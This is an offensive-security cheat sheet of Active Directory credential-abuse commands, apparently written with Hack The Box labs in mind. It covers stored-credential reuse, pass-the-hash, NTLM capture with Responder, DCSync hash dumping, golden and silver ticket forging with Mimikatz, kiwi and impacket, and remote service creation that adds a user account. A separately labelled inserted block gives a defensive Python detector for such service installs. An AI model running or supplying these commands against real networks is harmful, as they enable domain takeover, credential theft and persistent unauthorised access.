Credentials

Using Credentials

Check For Stored Credentials

cmdkey /list


Use Stored Credentials:

runas /user:administrator /savecred "cmd.exe /k whoami"



Access SMB With Credentials:

python /usr/share/doc/python3-impacket/examples/smbclient.py <Domain>/<user>@<ip> -hashes <LM hash>:<NT hash>



In Metasploit:

use auxiliary/scanner/smb/smb_login
use exploit/windows/smb/psexec

With CrackMapExec:

crackmapexec <ip(s)> -d <domain> -u <user> -p <pass>



Map A Drive

net use z: \\<ip>\c$ /user:<username> <password>


Gain A Hash

1.) Start Responder. Be sure to include --lm.
responder -I tun0 --lm

2.) Run dementor.py to obtain an NTLM response.
proxychains python dementor.py -d htb.local -u <user> -p <password> <target ip> <listening ip>



METERPRETER KIWI

Get Hash As Domain Admin (kiwi):

dcsync_ntlm <domain>\\<user>

Create Golden Ticket (kiwi):

golden_ticket_create -d <domain> -k <krbtgt hash> -s <domain-sid> -u <name, does not have to exist (but can)> -t <filename>


Create Skeleton Ticket With Impacket

python ticketer.py -nthash <hash> -domain-sid <sid> -domain OsbornePro DEV\$

OR

python ticketer.py -nthash <hash> -domain-sid <sid> -domain HTB DEV

OR

python ticketer.py -nthash <hash> -domain-sid <sid> -domain OsbornePro -spn cifs/<ip> <username>



Use The Created Skeleton Ticket:

1.) Set Value

export KRB5CCNAME=/root/Downloads/Tickets/OsbornePro.cache


2.) Edit krb5.conf File

nano /etc/krb5.conf
# CONTENTS

[realms]
    DOMAIN.COM = {
        kdc = dev.domain.com
        kdc = web.domain.com
        kdc = dc.domain.com
        admin_server = dc.domain.com
    }

3.) Connect To Target (-k authenticates with the Kerberos ticket in KRB5CCNAME, -N skips the password prompt)

proxychains smbclient \\\\<IP>\\C$ -U <user> -k -N



Create A Service To Exploit:

1.) Create A Service To Make A User

python /usr/share/doc/python3-impacket/examples/services.py -dc-ip <ip of domain controller> -k -no-pass <ip of target> create -name <username> -display <username> -path 'net user <username> <password> /add'


2.) Check The Service Values

proxychains python /usr/share/doc/python3-impacket/examples/services.py -dc-ip <DC IP> -k -no-pass <targetIP> config -name <createduser>


3.) Start The Service To Execute Command

proxychains python /opt/ActiveDirectory/impacket/examples/services.py -dc-ip <DC IP> -k -no-pass <TargetIP> start -name <username>
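Defensive counterpart to the three steps above, added here and not part of the original notes: a Python check that runs over System log Event ID 7045 ("A service was installed in the system") records and flags installs whose service binary path is an inline `net user ... /add` or `net localgroup ... /add` command rather than a .exe/.sys on disk, which is exactly what a service created with `-path 'net user <username> <password> /add'` leaves behind. The event records are constructed for this example and their field names are a simplified assumption, not the event's real XML schema.

```python
import re
from dataclasses import dataclass
from typing import Dict, List

# Constructed sample records modelled on System log Event ID 7045 ("A service
# was installed in the system"); the field names are simplified from that
# event and every value is made up for this example.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"EventID": "7045", "ServiceName": "WinDefend", "AccountName": "LocalSystem",
     "ImagePath": r'"C:\Program Files\Windows Defender\MsMpEng.exe"'},
    {"EventID": "7045", "ServiceName": "jsmith", "AccountName": "LocalSystem",
     "ImagePath": "net user jsmith P@ssw0rd1 /add"},
    {"EventID": "7045", "ServiceName": "updater", "AccountName": "LocalSystem",
     "ImagePath": "cmd.exe /c net localgroup administrators jsmith /add"},
    {"EventID": "7036", "ServiceName": "Spooler", "AccountName": "", "ImagePath": ""},
]

# A service whose binary path is an inline account or group-membership change.
ACCOUNT_CHANGE = re.compile(
    r"\bnet1?\s+(?:user|localgroup|group)\s+\S+.*\s/add\b", re.IGNORECASE)
# A normal service binary path points at a .exe or .sys file on disk.
BINARY_PATH = re.compile(r'^"?[A-Za-z]:\\.*\.(?:exe|sys)"?(?:\s|$)', re.IGNORECASE)

@dataclass
class Finding:
    service_name: str
    image_path: str
    reason: str

def analyze_service_installs(events: List[Dict[str, str]]) -> List[Finding]:
    """Return one Finding per service-installation event that looks abused."""
    findings: List[Finding] = []
    for ev in events:
        if ev.get("EventID") != "7045":          # only service-install events
            continue
        path = ev.get("ImagePath", "").strip()
        if ACCOUNT_CHANGE.search(path):
            reason = "service binary path adds a user or group member"
        elif not BINARY_PATH.match(path):
            reason = "service binary path is not a .exe/.sys file"
        else:
            continue                              # ordinary install, ignore
        findings.append(Finding(ev["ServiceName"], path, reason))
    return findings

if __name__ == "__main__":
    for f in analyze_service_installs(SAMPLE_EVENTS):
        print(f"[!] {f.service_name}: {f.reason} -> {f.image_path}")
```

The same two rules apply unchanged to Security log Event ID 4697, which carries the service file name in the same form.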


Use Golden Ticket (kiwi):

kerberos_ticket_use <filename>


Dump Domain Hashes With DCSync:

log    # optional: write all following output to mimikatz.log
lsadump::dcsync /domain:<domain> /all /csv


Create Golden Ticket Mimikatz:

kerberos::golden /user:<name> /domain:<domain> /sid:<domain-sid> /krbtgt:<krbtgt hash> /ticket:<filename> /groups:<comma separated group RIDs this 'virtual' user is part of>


Use Golden Ticket Mimikatz:

kerberos::ptt <filename>


====================

LINUX

====================

Become another user

su <username>


Become root User:

su -

OR

su root



Execute Command As Root:

sudo <command>


Execute Command As Another User:

sudo -u <username> <command>